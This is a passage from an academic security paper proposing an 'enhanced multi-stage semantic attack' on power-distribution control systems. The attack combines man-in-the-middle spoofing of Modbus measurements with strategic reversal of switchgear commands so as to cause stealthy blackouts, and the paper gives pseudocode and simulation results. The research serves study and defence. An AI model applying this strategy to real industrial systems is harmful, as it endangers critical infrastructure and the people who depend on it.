attack ability compared to the existing semantic attack. The rest of the paper is organized as follows. We introduce the research literature about intrusion detection in Section II. Some preliminaries of the enhanced semantic attack are pre- sented in Section III. In Section IV, we elaborate on the prin- ciples of the enhanced multi-stage semantic attack against ICS. Experiments are conducted in Section V to verify thestronger attack ability of the enhanced multi-stage semantic attack. Finally, a conclusion is drawn in Section VI. II. RELATED WORK Due to the growing openness of ICS, cyber attacks against traditional information systems also threaten the security of ICS. Traditional intrusion detection technology mainly fall into two classes: signature-based and anomaly-based. The former mainly relies on the accurate signatures of malicious attacks. System behavior that matches any existing attack signature is considered anomalous. On the contrary, the latter depends on a normal behavior model. Any system behav- ior that deviates from this model should be agged as an anomaly. Generally speaking, attacks against ICS usually violate protocol speci cations or cause abnormal network traf cs, and the physical constraints of ICS are likely to be broken during attack. Therefore, we introduce the intrusion detection technology on ICS from three aspects: network protocol analysis, network traf c mining, and process data analysis. A. NETWORK PROTOCOL ANALYSIS-BASED INTRUSION DETECTION Network protocols de ne a set of rules to specify how net- work devices should format, transmit and process informa- tion. Therefore, intrusion detection rules can be extracted from network protocols. Any system behavior that violates the detection rules is judged to be abnormal. Some open protocols are commonly used in ICS communication, e.g., ModBus, DNP3, ICCP/TASE.2. These protocols are vulner- able to a variety of malicious attacks such as eavesdrop- ping, tampering and counterfeiting, since ICS were designed to run in relatively closed environments and security was rarely considered in the design of industrial communication protocols. Cheung et al. [18] extracts a normal system behavior model from the industrial protocol speci cations. The model formalizes legal data values and legal relationships between different data elds. Furthermore, a set of communication modes are built according to data transmission ports, trans- mission directions and security requirements of ICS. Any behavior that violate the normal behavior model or the communication modes should be agged as an anomaly, so this detection technique also belongs to the anomaly-based intrusion detection. Morris et al. [19] construct signatures for ModBus protocol vulnerabilities by exploiting a famous intrusion detection system Snort . Communication data that matches any of these signatures is identi ed as an anomaly. Moreover, traditional IDS can be tailored or improved for intrusion detection on ICS. Lin et al. [20] successfully realize intrusion detection on ICS by implanting a DNP3 protocol parser into Bro, a network intrusion detection system devel- oped by the University of Berkeley. In addition to open protocols, proprietary protocols also play an important part in ICS communication. IDS based on proprietary protocol analysis has emerged. Hong et al. [21] 156872 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS extract speci cations from the IEC 61850 standards (e.g., Generic Object Oriented Substation Event (GOOSE) and Sample Value technology (SV)), based on which to identify abnormal or malicious behaviors in electric power substations. In [22], legal and illegal network traf c patterns are de ned based on the protocol speci cations of power systems. These patterns are further converted into Snort rules for intrusion detection. As described above, intrusion detection based on network protocol analysis mainly relies on the accurate de nition of detection rules, and usually yields a high false alarm rate and incurs a large message-parsing time overhead. Intrusion detection based on network traf c mining can overcome these shortcomings to some extent. B. NETWORK TRAFFIC MINING-BASED INTRUSION DETECTION Most ICS have xed business logics, static and simple net- work topologies, and a small number of programs. There- fore, traf cs in industrial networks are stable in most cases. Unusual traf c patterns generally indicate the occurrence of an anomaly, which is the main motivation of the network traf c mining-based intrusion detection. Traditional IDS based on network traf c mining [23] mainly rely on the analysis of network meta data, includ- ing IP addresses (i.e., source IP address for outbound packets and destination IP address for inbound packets), transmission ports, traf c durations, and packet intervals. Applying data mining techniques to network meta data can identify system anomalies effectively. Supervised [24] and semi-supervised [25] clustering, single-class [26] or multi-class [27] support vector machine, mixed Gaussian model [28], fuzzy logic [29][31], neural network [32], [33] and deep learning [34] are commonly used techniques for traf c mining. These techniques aim to model the non-linear relationships between network traf cs and system behaviors. The relationship model and real-time traf c data are used to investigate the current status of the system, and then detect malicious attacks timely. However, analyzing a large number of traf c features undoubtedly incurs a high computational overhead. Therefore, techniques like principal component analysis [35] and ant colony optimization [36] are used to remove redundant traf c features, thus to reduce computa- tional overhead. Intrusion detection techniques based on protocol analysis and traf c mining are borrowed from the traditional network intrusion detection domain. They are mainly designed for conventional information systems. A big difference between ICS and the traditional information systems (i.e., ICS are closely related to the physical world) makes these techniques dif cult to identify attacks against physical processes, since these attacks may not violate network protocol speci ca- tions or cause abnormal network traf cs. Hence, the intru- sion detection technology based on process data analysis has emerged.C. PROCESS DATA ANALYSIS-BASED INTRUSION DETECTION Industrial process data is another important information source for intrusion detection on ICS. It is likely for a system operator to make wrong decisions [37] if the process data is secretly counterfeited or tampered with, and eventually cause lethal damage to ICS. Generally, the deviation between the observed and expected process values can determine whether an attack has occurred [38]. In [39], all process variables are divided into three classes: constants, enumeration, and con- tinuous values. Each process variable has a normal behavior pattern. Once the monitored value of a process variable does not conform to its normal behavior pattern, an alarm is raised. In [40], system states are denoted by measurement data reported by a group of remote sensors, and a corresponding state distance measurement method is presented. Anomalies can be detected by inspecting the distance between the current state and the critical states. Time series forecasting provides another potential solution for intrusion detection on ICS. This technology can precisely predict the future outputs of ICS, which are then compared with the monitored outputs to generate residuals. By applying proper statistical techniques to the residuals, IDS can detect malicious attacks effectively. In general, the residual series conforms to a Gaussian distribution during normal operation of ICS. If an attack occurs, there will be a signi cant deviation between the actual and expected system behaviors, i.e., the residuals deviate from 0 notably [41]. Two kinds of intrusion detection techniques based on residual analysis are summa- rized in [42]: sequential detection and change detection. The rst technique can identify anomalies as quickly as possible. In other words, it determines the shortest residual sequence based on which IDS can make a judgement. The second technique identi es an anomaly if the residual [43] or the cumulative residual [16] exceeds a prede ned threshold at a certain time point. Recently, Kleinmann et al. [17] propose a multi-stage semantic attack against ICS by tampering with the mea- surement data and the control instructions simultaneously. They state that the Modbus protocol has no security protec- tion mechanism or message integrity protection mechanism, which opens up a back door for malicious attackers. This vulnerability enables the adversary to reverse the semantic meaning of control instructions and present a fake view of measurement data to the HMI at the same time. However, this attack is sometimes futile, because it cannot exactly decide which control instructions to manipulate. Randomly reversing some instructions cannot guarantee to realize the attack goal. In this work, we design an enhanced multi-stage semantic attacks against ICS, which makes full use of the system state transition rules and strategically decides which control instructions to reverse, thus to bring the target system into dangerous situations precisely. The enhanced semantic attack is totally undetectable by traditional IDS because all process values are legal during this attack. Additionally, it can improve the attack success rate signi cantly when compared VOLUME 7, 2019 156873 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 1. The Electricity Distribution Subsystem (Following [17]). to the existing instruction-reversing semantic attack proposed in [17]. III. PRELIMINARIES In this section, we present some preliminaries of the enhanced semantic attack, including the communication mechanism of Modbus, the architecture of the electrical distribution systema typical industrial system, and the underlying adversary model. A. MODBUS ModBus is a de facto application layer protocol for ICS. This protocol supports a master-slave communication mode between different control devices, even if they are within different types of buses or networks. Most Modbus sys- tems use TCP as the communication layer protocol. A Mod- bus/TCP message is embedded in TCP segments and TCP port 502 is reserved for Modbus communications. In Mod- bus communications, usually the HMI acts as the unique master and the remote PLCs act as slaves. In a trans- action, the master requests process data from the slaves or issues control instructions to the slaves. The slaves respond by sending the requested data to the master or by performing the control instructions. The request mes- sage from the master contains a unique transaction ID, which should be contained in the corresponding response message. A Modbus Protocol Data Unit (PDU) consists of two elds: a single-byte Function code and a variable-size Payload (lim- ited to 252 bytes). The Function code speci es the operation to be taken, and the Payload contains parameters required by the function invocation. For example, the Payload of a read request consists of two elds, a reference number and a bit/word count. The former speci es the starting memory address for reading. The latter speci es the number of mem- ory object units to be read. The payload of the corresponding response message is comprised of two parts: byte count and data, which respectively record the length of data in bytes and the data contents that were read. In addition to the startingmemory address, the payload of a write message has another eld that speci es the data to be written. Unfortunately, Modbus has little ability to defend itself against malicious attacks, e.g., data tampering or counterfeit- ing. Moveover, Modbus only uses TCP sequence numbers to provide simple session semantics, but cannot ensure message integrity or long-term session semantics. Therefore, TCP session hijacking becomes quite straightforward. B. ELECTRICITY DISTRIBUTION SYSTEM An electricity supply chain is typically comprised of three subsystems: generation, transmission, and distribution, as illustrated in Fig. 1. The transmission network connects the generation system with the distribution system. Elec- tricity is transmitted from generation sites to remote dis- tribution substations along high-voltage transmission lines. The high voltage (138 kV to 765 kV) is then converted to medium-voltage (600V to 35kV) by substation transform- ers. A group of medium-voltage circuits fan out from the substation. The medium voltage is further stepped down to the low voltage (commonly 120/240V) by the distribution transformers close to end users. In this work, we mainly discuss the distribution subsystem between the substations and distribution transformers, which is the target system of the ``BlackEnergy" cyber-attack. In order to improve reliability, distribution circuits are usu- ally equipped with ``tie switches'' (also called switchgears, which are normally disconnected) to other circuits. If one of the circuits encounter an unintentional fault, it will be connected to another circuit by an adjacent switchgear. Thus, electricity ows into the faulted circuit and some necessary services are restored. The switchgears can be operated auto- matically or manually from the HMI. A simpli ed model of the subsystem is shown in Fig. 2. Two medium-voltage circuits fan out from the substation. There are six PLCs (i.e., PLC01PLC06) along the top circuit and four PLCs (i.e., PLC08PLC11) along the bottom circuit. Addi- tionally, the two distribution lines are interconnected by a normally open switchgear that is controlled by PLC07. 156874 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 2. The Electricity Distribution Subsystem. C. ADVERSARY MODEL In the adversary model, we suppose that the attacker can penetrate into the control network and launch a Man-In-The- Middle (MITM) attack between the HMI and remote PLCs. On the hijacked communication link, all network packets can be eavesdropped, replayed, delayed or deleted before reach- ing their destinations. Furthermore, the attacker can modify the packet contents and even take over the HMI to fabricate malicious control instructions. The goal of the adversary is to disrupt the normal operation of ICS and cause fatal damages to the physical system. Furthermore, suppose that the adversary has gained suf - cient knowledge of the ICS architecture, the industrial pro- cess and the way to manipulate the target system. Here, we use a somewhat weaker type of attack model: the attacker can penetrate into the control network, and launch MITM attacks on one or more HMI-PLC communication links simultaneously. However, this model is assumed to be state- less, i.e., it does not tamper with TCP sequence numbers. Therefore, this model cannot delete existing messages or inject fake ones. It can only manipulate the contents of exist- ing packets. IV. ENHANCED MULTI-STAGE SEMANTIC ATTACK In this section, we elaborate on the strategy of the enhanced multi-stage semantic attack against ICS. A. DEFINITION OF SYSTEM STATES Suppose that an electricity distribution subsystem involves a set of con gurable state variables that is denoted by fx1,x2,: : :,xNg, where Nis the total number of state variables, andxi2f1;1g(1iN) is the ith state variable, which denotes the status (closed or open) of the ith switchgear. Hence, a state vector xcan be used to represent the status of the entire system at a certain time point V xD(x1;x2; : : : ; xN); (1) All possible values of the state vector xconstitute a set X. In the electricity distribution subsystem, Xis comprised of three mutually exclusive subsets, a normal state set N, a fault state set Fand a critical state set C. The normal states in N indicate that the system is operating normally. If there occursome unavoidable disturbance or system faults, the system enters a fault state contained in Fto restore some necessary services and nally return to the normal state. However, if the system encounters some malicious attacks, it will be brought into some dangerous or unwanted situations (i.e., critical states), like large-scale blackouts. The normal state set Nof the electricity distribution sys- tem is formalized as follows V NDfxNor1;xNor2; : : : ; xNor Lg; (2) where NX,Lis the total number of the normal state vectors, and xNor l(1lL) is the lth normal state vector, which consists of the values of Nstate variablesV xNor lD(xNor l 1;xNor l 2; : : : ; xNor l N): (3) Analogously, the fault state set and critical state set are de ned byV FDfxFau1;xFau2; : : : ; xFauKg; (4) and CDfxCri1;xCri2; : : : ; xCriMg; (5) where FandCare two subsets of X(i.e.,FX, CX),KandMare the numbers of fault states and critical states, respectively. Furthermore, the fault state vector and the critical state vector are de ned by V xFaukD(xFauk 1;xFauk 2; : : : ; xFauk N); (6) and xCrimD(xCrim 1;xCrim 2; : : : ; xCrim N): (7) where xFauk i(1kKand 1iN) denotes the ith entry of the kth fault state vector, and xCrim j(1mM and 1jN) denotes the jth entry of the mth critical state vector. The three subsets N,FandCare mutually exclusive and together constitute the entire state set X, i.e.,N\FD N\CDF\CD?andN[F[CDX. B. SYSTEM STATE TRANSITION Based on the de nition of system states, we now de ne the state transition rules. Suppose that the system operator can con gure the target system manually, i.e., issue the ``open'' or ``close'' instructions to change the status of switchgears. Therefore, we use a variable a2f 1;1;0gto denote differ- ent operations the system operator can take on a switchgear. The values1, 1, and 0 represent the ``open'', ``close'' and no action, respectively. Suppose that there are Noperable switchgears in the system, corresponding to Ncon gurable state variables mentioned above. A N-tuple vector aD (a1;a2; : : : ; aN) is used to represent all operations taken by the system operator at a certain time point. Each entry ai2f 1;1;0gdenotes the operation taken on the ith state variable xi. State transition rules describe how the system behavior changes over time. We use xi(t) and xi(tC1) to denote VOLUME 7, 2019 156875 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 3. The System State Transition Graph. the current state and the next state of the ith switchgear, respectively. An operation ai(t) can drive xi(t) toxi(tC1), so we formalize the state transition of a swithgear as followsV xi(tC1)Dxi(t) ai(t); (8) where the operator de nes the following rule V xi(tC1)D( ai(t);if a i(t)6D0; xi(t);otherwise :(9) This equation indicates that the next state xi(tC1) is deter- mined jointly by the current state xi(t) and the current opera- tionai(t). If no operation is taken (i.e., ai(t)D0),xi(tC1) is set equal to xi(t). Otherwise, xi(tC1) is set equal to ai(t). Therefore, the state transition of the entire system can be formalized byV x(tC1)Dx(t) a(t); (10) where the state transition of each element of the state vector x follows Eq. 8. The state transition graph is illustrated in Fig. 3. A normal state transits to a fault state if some unavoidable disturbances or faults occur. A fault state can return to a nor- mal state after the necessary services are restored. However, if the target system encounters a malicious attack, it is likely to enter a critical state from a normal state or a fault state. C. ATTACK STRATEGY With the de nition of system states and state transition rules, we now describe the strategy of the enhanced multi-stage semantic attack against ICS. The attack strategy mainly con- sists of measurement data deception and control instruction manipulation. During measurement data deception, a fake view of process data is presented to the HMI, thus to induce the system operator to take some unnecessary operations. Afterwards, the issued instructions are tampered with by the attacker to achieve speci c attack goals. Below we elaborate on the two attack steps.1) MEASUREMENT DATA DECEPTION During measurement data deception, the attacker can change the measurement data, e.g., current and voltage values reported by victim PLCs, to any legitimate value, thus to bypass IDS. Suppose that the victim PLCs are those con- trolling the top line in Fig. 2 (i.e., PLC01 to PLC06). The left graph in Fig. 4 shows the actual values of the current and voltage reported by PLC01. The right graph depicts the fake values of the same measurement data presented to the HMI. When the system is attacked (from 240s to 270s), zero current and zero voltage are presented to the HMI. The fake view simulates a natural fault on the top line, so it is not regarded as a malicious attack. In other words, the attack is totally stealthy. The fake view misleads the system operator into taking uncessary remediation measures, which may be costly and harmful. Furthermore, it provides the attacker a good opportunity to manipulate the control instructions maliciously. 2) CONTROL INSTRUCTION MANIPULATION Once the system operator observes the zero current and zero voltage reported by remote PLCs for a period of time, he will drive the system to a fault state by issuing speci c control instructions. Suppose that a set of control instructions that is denoted by anl!fkis issued to change the status of one or more switchgears. At this moment, the attacker can change the vec- toranl!fkto a malicious one anl!cmbefore the instructions reach their destinations, thus bringing the system into a crit- ical state. Here, anl!fkandanl!cmare the operation vectors that can drive the system from the normal state to a fault state and a critical state, respectively. In order to bypass intrusion detection, the tampered instructions should meet the follow- ing two conditions: 1) janl!fkjDj anl!cmjand 2) anl!fk6D anl!cm, wherejaj D (jakj)1kNdenotes the vector of absolute values of a's elements. Thus, no existing instruction is dropped and no fabricated instruction is injected. Addition- ally, all instruction values remain legitimate in the tampered messages, so the attack is totally stealthy. If the attacker fails to manipulate the instructions in this step, he has another chance. When the system has restored the necessary services, it should return to the normal state from the fault state once the system operator issues the cor- responding instructions afk!nl. At this moment, the attacker can rewrite afk!nlinto a malicious vector afk!cm, in order to bring the system into a critical state. Analogously, afk!cm should satisfyjafk!nlj D j afk!cmjand afk!nl6Dafk!cm. Once the system enters a critical state, the attack goal is achieved. The entire procedure of the Enhanced Multi-Stage Seman- tic Attack (EM2SA for short) is summarized in Algorithm 1. The normal, fault and critical system state sets are used as inputs to the algorithm. The output of the algorithm is a boolean variable agthat indicates whether the seman- tic attack is successful or not. The initial value of ag is set to false, as shown in line 1. Lines 2 and 3 make 156876 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 4. Measurement Data Deception Attack. Algorithm 1 EM2SA Algorithm Input : The normal, fault and critical system state collections N,FandC Output : a agindicating whether the attack is successful or not 1 ag false; 2construct the state transition graph G; 3Penetrate the control network to get a Man-In-The-Middle position; 4launch the measurement data deception attack when state system2N; 5while truedo 6 tamper with the control instruction anl!fkto anl!cm, that satis esjanl!fkjDj anl!cmjand anl!fk6Danl!cm; 7 wait for the system state transition; 8 ifstate system2Cthen 9 ag true; 10 break; 11 else 12 launch the measurement data deception attack; 13 tamper with the new control instruction afk!nltoafk!cm, that satis es jafk!nljDj afk!cmjandafk!nl6Dafk!cm; 14 wait for the system state transition; 15 ifstate system2Cthen 16 ag true; 17 break; 18 end 19 end 20end 21return ag; some preparations, including building the state transition graph and getting a Man-In-The-Middle position in thecontrol network. Lines 4 to 20 are the whole procedure of the semantic attack. Line 4 launches the measurement data deception attack when the system operates normally, which presents a fake view of the measurement data to the HMI. Afterwards, the attacker tampers with the instructions issued by the system operator and waits for the system state transi- tion (lines 6 and 7). If this attack is successful (i.e., the system enters a critical state: state system2C), the output variable ag is set to trueand the attack procedure ends (lines 8 to 10). Otherwise, the attacker has another chance to manipulate the control instructions when the system is going back to the normal state, as shown in lines 11 to 19. If both the two attacks are unsuccessful, the attacking procedure should be restarted, and line 20 returns the output variable ag. V. EXPERIMENTS AND DISCUSSION In this section, we simulate the above-mentioned electricity distribution subsystem in Java language and launch two dif- ferent semantic attacks on the simulated system. The archi- tecture of the simulated ICS is depicted in Fig. 2, including a substation and two radial distribution lines, each with a group of PLCs. One virtual machine is used to simulate the HMI, which acts as the Modbus master. Other virtual machines simulate the remote PLCs, which serve as the Mod- bus slaves. On the simulated system, we launch two attacks: the enhanced multi-stage semantic attack proposed in this work and the instruction-reversing semantic attack proposed in [17], and compare the success rate of the two attacks. We present the normal current values reported by three key PLCs ( PLC01, PLC07 and PLC11) and the normal voltage value reported by PLC01 in Fig. 5. The voltage value remains stable, while the current values measured by PLC01 and PLC11 vary with the changing loads. The switchgear con- trolled by PLC07 keeps open when the system operates nor- mally, so the current reported by PLC07 is zero. Fig. 6a and Fig. 6b respectively show the fake measure- ment data presented to the HMI and the actual measurement data when the system encounters the instruction-reversing VOLUME 7, 2019 156877 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 5. Normal Measurement Data. FIGURE 6. The Fake and Actual Measurement Data during the Instruction-Reversing Semantic Attack [17]. semantic attack proposed in [17]. As we can see from Fig. 6a, the measurement data deception starts at 210s. After that, the system operator observes the zero current and zero voltageat PLC01 on the HMI. Therefore, the system operator issues control instructions to open the switchgear controlled by PLC01 and close the switchgear controlled by PLC07 at 240s. 156878 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 7. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by One-Step Instruction Tampering. Thus the system enters a fault state and the top line begins to restore necessary services. After 240s, the HMI is still pro- vided with a fake view of the measurement data: small values of the current and voltage at PLC01, misleading the system operator into believing the system is being restored. After a period of time, the operator issues control instructions to connect the switchgear controlled by PLC01 and disconnect the switchgear controlled by PLC07 at 270s, in order to bring the system back to normal. Afterwards, the attacker shows the normal current and voltage values to the HMI, presenting an illusion that the system has returned to normal. However, the actual status of the system is shown in Fig. 6b. The attacker reverses each control instruction at 240s and 270s. In detail, the switchgears controlled by PLC01 and PLC07 are respectively closed and opened at 240s, and then respectively opened and closed at 270s. Therefore, the two switchgears maintain the status quo from 240s to 270s, and the mea- surement data are normal during this period. From 270s, the system enters a super uous fault recovery phase, so the currents at PLC01 and PLC07 and the voltage at PLC01 aresigni cantly smaller than their normal values. Therefore, the attack goal is not achieved since the system does not enter a critical state. Fig. 7 shows the fake and actual measurement data dur- ing the enhanced multi-stage semantic attack proposed in this work. Firstly, we suppose that the rst-step instruction tampering succeeds. Similar to Fig. 6a, Fig. 7a shows that the measurement data deception starts at 210s. After tam- pering with the ``fault recovery'' instructions successfully, the attacker presents the small current and voltage values to the HMI after 240s, misleading the system operator into believing the system is being restored. However, as shown in Fig. 7b, the attacker manipulates the instructions strate- gically at 240s according to Algorithm 1, i.e., reversing the instruction sent to PLC01 while keeping the instruc- tion sent to PLC07 unchanged, in order to bring the sys- tem into a critical state. Hence, the actual current and voltage at PLC01 become zero at 240s, which indicates a blackout on the top transmission line, so the attack goal is achieved. VOLUME 7, 2019 156879 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 8. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by Two-Step Instruction Tampering. If the rst-step instruction tampering is unsuccessful, the attacker has another chance. As depicted in Fig. 8, the attacker fails to tamper with the control instructions at 240s, but succeeds to manipulate the instruction sent to PLC01 at 270s. Therefore, the system enters a critical state after 270s (both the current and voltage at PLC01 become zero), as shown in Fig. 8b, but the fake measurement data pre- sented to the HMI are normal after 270s, as shown in Fig. 8a. Figs. 7 and 8 indicate that there are two possible paths from the normal state to a critical state during the enhanced multi-stage semantic attack, which are represented by the two red dashed lines in Fig. 9. Specially, if the attacker can randomly choose one or more instructions to tamper with during the instruction-reversing semantic attack proposed in [17], the proposed enhanced semantic attack is a special case of that kind of attack. Addi- tionally, suppose that each instruction tampering attack has a Possibility of Failure (PoF for short). Based on the assump- tions, we compare the success rate of the two kinds of seman- tic attacks on the simulated system. The instruction-reversing semantic attack can randomly choose whether to reverse FIGURE 9. Two Attack Paths During the Enhanced Semantic Attack. an eavesdropping instruction, while the enhanced semantic attack manipulates an instruction strategically according to Algorithm 1. In this experiment, PoF varies from 0.1 to 0.9, with a step value of 0.1. For each value of PoF, we conduct 5000 simulations for each attack. The comparison of the two attacks is illustrated in Fig. 10. Obviously, the success rate of the enhanced multi-stage semantic attack is signi cantly 156880 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 10. Comparison of Attack Success Rates of Two kinds of Attacks. higher than that of the instruction-reversing attack, which veri es the stronger attack ability of the enhanced attack. VI. CONCLUSION In this paper, we propose an enhanced multi-stage semantic attack against ICS. During this attack, a fake view of mea- surement data is rst presented to the HMI to mislead the system operator into issuing unnecessary control instructions. Thus, the attacker has chances to manipulate the control instructions strategically according to system state transition rules, and precisely bring the target system into a critical state. In the meanwhile, the measurement data deception attack should be continued in order to conceal the on-going attack. Furthermore, this attack is totally stealthy, since the command sequences, message sizes, and process values all remain legitimate. To verify the strong attack ability of the enhanced multi-stage semantic attack, we simulate an elec- tricity distribution subsystem in Java language. Additionally, we compare the attack success rate of the enhanced semantic attack with that of the existing instruction-reversing seman- tic attack. The experimental results show that the enhanced semantic attack can signi cantly improve the attack success rate. In future research, we will try to investigate the pro- posed attack on some real-world and large-scale ICS testbeds and seek for effective countermeasures against this kind of attacks, e.g., securing the communication channel via crypto- graphic means, e.g., by adding data integrity protections such as digital signatures or message authentications to prevent the attacker from modifying packets. REFERENCES [1] K. Stouffer, J. Falco, and K. Scarfone, ``Guide to industrial control systems (ics) security,'' NIST Special Publication , vol. 800, no. 82, p. 16, 2011. [2] J. Tian, R. Tan, X. Guan, and T. Liu, ``Enhanced hidden moving tar- get defense in smart grids,'' IEEE Trans. Smart Grid , vol. 10, no. 2, pp. 22082223, Mar. 2019. [3] Y. Mo, T. H.-J. Kim, K. Brancik, D. Dickinson, H. Lee, A. Perrig, and B. Sinopoli, ``Cyberphysical security of a smart grid infrastructure,'' Proc. IEEE , vol. 100, no. 1, pp. 195209, Jan. 2012. [4] T. Liu, Y. Liu, Y. Mao, Y. Sun, X. Guan, W. Gong, and S. Xiao, ``A dynamic secret-based encryption scheme for smart grid wireless communication,'' IEEE Trans. Smart Grid , vol. 5, no. 3, pp. 11751182, May 2014.[5] S. Yin, S. X. Ding, A. Haghani, H. Hao, and P. Zhang, ``A comparison study of basic data-driven fault diagnosis and process monitoring methods on the benchmark Tennessee Eastman process,'' J. Process Control , vol. 22, no. 9, pp. 15671581, 2012. [6] J. Weiss, ``Industrial control system (ics) cyber security for water and wastewater systems,'' in Securing Water and Wastewater Systems . Cham, Switzerland: Springer, 2014, pp. 87105. [7] M. R. Akhondi, A. Talevski, S. Carlsen, and S. Petersen, ``Applications of wireless sensor networks in the oil, gas and resources industries,'' inProc. 24th IEEE Int. Conf. Adv. Inf. Netw. Appl. (AINA) , Apr. 2010, pp. 941948. [8] A. D. Papadopoulos, A. Tanzman, R. A. Baker, Jr., R. G. Belliardi, and D. J. Dube, ``System for remotely accessing an industrial control system over a commercial communications network,'' U.S. Patent 6 061 603 A, May 9, 2000. [9] R. K. Koehler, ``When the lights go out: Vulnerabilities to us critical infras- tructure, the russian cyber threat, and a new way forward,'' Georgetown Secur. Stud. Rev , vol. 7, no. 1, pp. 2736, 2018. [10] L. Maglaras, K. H. Kim, H. Janicke, M. A. Ferrag, S. Rallis, P. Fragkou, A. Maglaras, and T. J. Cruz, ``Cyber security of critical infrastructures,'' ICT Exp. , vol. 4, no. 1, pp. 4245, 2018. [11] J. Staggs, Adventures in Attacking Wind Farm Control Networks . Las Vegas, NV, USA: Black Hat, 2017. [Online]. Available: https://www. blackhat.com/docs/us-17/wednesday/us-17-Staggs-Adventures-In- Attacking-Wind-Farm-Control-Networks.pdf [12] D. Ding, Q.-L. Han, Y. Xiang, C. Ge, and X.-M. Zhang, ``A survey on secu- rity control and attack detection for industrial cyber-physical systems,'' Neurocomputing , vol. 275, pp. 16741683, Jan. 2018. [13] Z. Ling, K. Liu, Y. Xu, Y. Jin, and X. Fu, ``An end-to-end view of IoT secu- rity and privacy,'' in Proc. IEEE Global Commun. Conf. (GLOBECOM) , Dec. 2017, pp. 17. [14] P. Haller and B. Genge, ``Using sensitivity analysis and cross-association for the design of intrusion detection systems in industrial cyber-physical systems,'' IEEE Access , vol. 5, pp. 93369347, 2017. [15] Z. Zhang, H. Zhu, S. Luo, Y. Xin, and X. Liu, ``Intrusion detection based on state context and hierarchical trust in wireless sensor networks,'' IEEE Access , vol. 5, pp. 1208812102, 2017. [16] D. I. Urbina, J. A. Giraldo, A. A. Cardenas, N. O. Tippenhauer, J. Valente, M. Faisal, J. Ruths, R. Candell, and H. Sandberg, ``Limiting the impact of stealthy attacks on industrial control systems,'' in Proc. ACM SIGSAC Conf. Comput. Commun. Secur. , Oct. 2016, pp. 10921105. [17] A. Kleinmann, O. Amichay, A. Wool, D. Tenenbaum, O. Bar, and L. Lev, ``Stealthy deception attacks against SCADA systems,'' in Computer Secu- rity. Berlin, Germany: Springer, 2017, pp. 93109. [18] S. Cheung, B. Dutertre, M. Fong, U. Lindqvist, K. Skinner, and A. Valdes, ``Using model-based intrusion detection for SCADA networks,'' in Proc. SCADA Secur. Sci. Symp. , vol. 46, 2007, pp. 112. [19] T. Morris, R. Vaughn, and Y. Dandass, ``A retro t network intrusion detection system for modbus rtu and ascii industrial control systems,'' in Proc. 45th Hawaii Int. Conf. Syst. Sci. (HICSS) , Jan. 2012, pp. 23382345. [20] H. Lin, A. Slagell, C. Di Martino, Z. Kalbarczyk, and R. K. Iyer, ``Adapt- ing bro into SCADA: Building a speci cation-based intrusion detection system for the dnp3 protocol,'' in Proc. 8th Annu. Cyber Secur. Inf. Intell. Res. Workshop , Jan. 2013, p. 5. [21] J. Hong, C.-C. Liu, and M. Govindarasu, ``Detection of cyber intrusions using network-based multicast messages for substation automation,'' in Proc. ISGT , Feb. 2014, pp. 15. [22] H. Hadeli, R. Schierholz, M. Braendle, and C. Tuduce, ``Leveraging determinism in industrial control systems for advanced anomaly detection and reliable security con guration,'' in Proc. IEEE Conf. Emerg. Technol. Factory Autom. (ETFA) , Sep. 2009, pp. 18. [23] P. Stavroulakis and M. Stamp, The Handbook of Communication and Security . Cham, Switzerland: Springer, 2010. [24] C.-H. Tsang and S. Kwong, ``Multi-agent intrusion detection system in industrial network using ant colony clustering approach and unsuper- vised feature extraction,'' in Proc. IEEE Int. Conf. Ind. Technol. (ICIT) , Dec. 2005, pp. 5156. [25] H. Wang, ``On anomaly detection and defense resource allocation of industrial control networks,'' Ph.D. dissertation, College Control Sci. Eng., Zhejiang Univ., Hangzhou, China, 2014. [26] L. A. Maglaras and J. Jiang, ``Intrusion detection in SCADA systems using machine learning techniques,'' in Proc. Sci. Inf. Conf. (SAI) , Aug. 2014, pp. 626631. VOLUME 7, 2019 156881 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS [27] Y. Luo, ``Research and design on intrusion detection methods for industrial control system,'' Ph.D. dissertation, College Control Sci. Eng., Zhejiang Univ., Hangzhou, China, 2013. [28] I. Kiss, B. Genge, and P. Haller, ``A clustering-based approach to detect cyber attacks in process control systems,'' in Proc. 13th IEEE Int. Conf. Ind. Inform. (INDIN) , Jul. 2015, pp. 142148. [29] O. Linda, M. Manic, T. Vollmer, and J. Wright, ``Fuzzy logic based anomaly detection for embedded network security cyber sensor,'' in Proc. IEEE Symp. Comput. Intell. Cyber Secur. (CICS) , Apr. 2011, pp. 202209. [30] O. Linda, M. Manic, J. Alves-Foss, and T. Vollmer, ``Towards resilient critical infrastructures: Application of Type-2 Fuzzy Logic in embedded network security cyber sensor,'' in Proc. 4th Int. Symp. Resilient Control Syst. (ISRCS) , Aug. 2011, pp. 2632. [31] O. Linda, M. Manic, and T. Vollmer, ``Improving cyber-security of smart grid systems via anomaly detection and linguistic domain knowledge,'' in Proc. 5th Int. Symp. Resilient Control Syst. (ISRCS) , Aug. 2012, pp. 4854. [32] T. Vollmer and M. Manic, ``Computationally ef cient neural network intrusion security awareness,'' in Proc. 2nd Int. Symp. Resilient Control Syst. (ISRCS) , Aug. 2009, pp. 2530. [33] O. Linda, T. Vollmer, and M. Manic, ``Neural network based intrusion detection system for critical infrastructures,'' in Proc. Int. Joint Conf. Neural Netw. (IJCNN) , Jun. 2009, pp. 18271834. [34] A. Javaid, Q. Niyaz, W. Sun, and M. Alam, ``A deep learning approach for network intrusion detection system,'' in Proc. 9th EAI Int. Conf. Bio-Inspired Inf. Commun. Technol. (Formerly BIONETICS) (ICST) , May 2016, pp. 2126. [35] C. Hou, J. Hanhong, W. Rui, and L. Liu, ``A probabilistic 